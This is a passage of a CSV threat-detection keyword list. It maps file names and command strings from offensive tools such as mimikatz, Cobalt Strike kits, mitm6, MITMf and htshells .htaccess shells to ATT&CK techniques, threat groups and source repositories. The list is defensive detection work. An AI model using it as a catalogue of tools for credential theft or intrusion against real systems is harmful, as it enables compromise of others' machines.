T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" +"*mirrors.aliyun.com/parrot*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*misc::aadcookie*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::clip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::cmd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::compress*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::detours*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::efs*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::lock*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::memssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::mflt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::ncroutemon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::ngcsign*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::printnightmare*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::regedit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::shadowcopies*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::skeleton*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::spooler*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::taskmgr*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::wp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::xor*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*miscbackdoorlnkhelp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*missile-command.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mitm6 --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*mitm6 -d *","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1478","229","2022-07-05T09:47:15Z","2018-01-10T21:27:28Z" +"*mitm6.py*","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1478","229","2022-07-05T09:47:15Z","2018-01-10T21:27:28Z" +"*mitmdump -*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*mitmdump -s aerosol.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*MITMf.py*","offensive_tool_keyword","MITMf","Framework for Man-In-The-Middle attacks","T1557 - T1192 - T1173 - T1185","TA0001 - TA0011 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/MITMf","1","1","N/A","N/A","10","3480","1090","2018-08-28T15:44:25Z","2014-07-07T11:13:51Z" +"*mitmproxy*","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","N/A","N/A","10","32422","3800","2023-10-02T22:25:26Z","2010-02-16T04:10:13Z" +"*mitmsocks*","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","0","N/A","N/A","1","30","9","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" +"*mitmsocks4j*","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy for Java","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","1","N/A","N/A","1","30","9","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" +"*mjnbclmflcpookeapghfhapeffmpodij*","greyware_tool_keyword","Ultrareach VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*mjolnodfokkkaichkcjipfgblbfgojpa*","greyware_tool_keyword","DotVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1564 - T1592 - T1547 - T1562","TA0010 - TA0011 - TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","0","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*MockDirUACBypass*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*MockDirUACBypassDll*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*Mockingjay_BOF.sln*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" +"*Mockingjay_BOF-main*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" +"*mod_auth_remote.phish.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_buster.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*mod_caucho.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_cgi.shell.bash.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_cgi.shell.bind.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_cgi.shell.windows.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_mono.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_multi.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*mod_nikto.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web 